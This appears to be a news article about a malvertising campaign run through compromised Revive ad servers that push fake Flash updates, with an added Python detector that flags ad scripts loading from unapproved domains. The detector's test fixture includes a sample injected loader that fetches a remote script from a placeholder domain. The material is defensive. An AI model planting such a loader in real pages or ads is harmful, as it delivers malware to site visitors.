In a malvertising campaign, a group of attackers is trying to infect users' computers with malware. Confiant says that almost 50 advertising servers are affected.
“If we take a look at the volumes behind just one of the compromised RTB ad servers – we see spikes of up to 1.25 [million] affected ad impressions in a single day,” said Eliya Stein, a Senior Security Engineer at Confiant.
Malicious Script That Retrieves Content From A New Domain
Once the attackers have taken control of an advertising server, they deliver, alongside the advertising that is actually being distributed, a disguised malicious script that retrieves content from a new domain. This content comes from an advertising network that is notorious for spreading malware. Usually, the user is shown a banner that pretends to be a Flash update and tries to tempt them into installing a program. It is unclear exactly which malware is installed on users' machines.
The Attackers Make At Least A Minimal Effort To Hide Their Activities
Cookies ensure that the malicious content is not displayed to the same user too often. The malicious script also checks whether the user has opened the browser's developer console.
Compromised Revive servers allow cybercriminals to add malicious code to existing ads unnoticed. Once these ads are loaded from legitimate websites, the malicious code tries to redirect visitors to malware websites. There, users are often offered fake updates for the Adobe Flash Player.
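For an ad server operator, one practical check against the kind of tampering described above is to scan served creatives for scripts that load content from domains the operator never approved. The following is an added example written for this article, not code from Confiant or from the Revive project; the allowlisted domains and the two sample creatives are constructed for illustration. It is a heuristic only: an obfuscated loader that does not contain a literal URL would not be caught this way.

```python
"""Flag ad creatives whose scripts pull content from unexpected domains.

Added example for this article (not Confiant's or Revive's code). The
allowlist and the sample creatives below are constructed placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: domains this ad server's creatives are expected to use.
ALLOWED_DOMAINS = {"ads.example-publisher.test", "cdn.example-adnetwork.test"}

# Absolute URLs embedded in inline script bodies (stops at quotes and whitespace).
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class _ScriptCollector(HTMLParser):
    """Collect URLs from <script src>, <iframe src> and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        if tag in ("script", "iframe"):
            for name, value in attrs:
                if name == "src" and value:
                    self.urls.append(value)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script:
            self.urls.extend(URL_RE.findall(data))


def domain_of(url):
    """Return the lowercased host of an absolute or protocol-relative URL.

    Relative paths (same-origin) yield "" and are ignored by the caller.
    """
    parsed = urlparse(url if "//" in url else "//" + url, scheme="https")
    return (parsed.hostname or "").lower()


def suspicious_domains(creative_html, allowed=ALLOWED_DOMAINS):
    """Return sorted hosts referenced by scripts that are not on the allowlist."""
    collector = _ScriptCollector()
    collector.feed(creative_html)
    found = set()
    for url in collector.urls:
        host = domain_of(url)
        if host and host not in allowed:
            found.add(host)
    return sorted(found)


# Constructed sample creatives: a clean banner, and the same banner with an
# injected inline loader that fetches a script from an unapproved domain.
CLEAN_CREATIVE = (
    '<a href="https://cdn.example-adnetwork.test/click">'
    '<img src="https://cdn.example-adnetwork.test/banner.png"></a>'
    '<script src="https://cdn.example-adnetwork.test/track.js"></script>'
)
TAMPERED_CREATIVE = CLEAN_CREATIVE + (
    '<script>var s=document.createElement("script");'
    's.src="https://unknown-third-party.test/loader.js";'
    'document.body.appendChild(s);</script>'
)

if __name__ == "__main__":
    for label, creative in (("clean", CLEAN_CREATIVE), ("tampered", TAMPERED_CREATIVE)):
        print(label, suspicious_domains(creative))
```

Run periodically against the creatives actually stored on the ad server, any hit is a reason to compare the creative against the version the advertiser originally uploaded.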
While so-called malvertising campaigns are not new, this approach differs significantly from the strategies of other groups. Until now, attackers have limited themselves to buying advertising space on legitimate websites through fake advertising companies and then filling those spaces with malicious advertising. This tactic works because ad code is often not adequately checked, or because dubious vendors tolerate the malvertising business since it brings them revenue. Taking over ad servers is very rare, especially on this scale.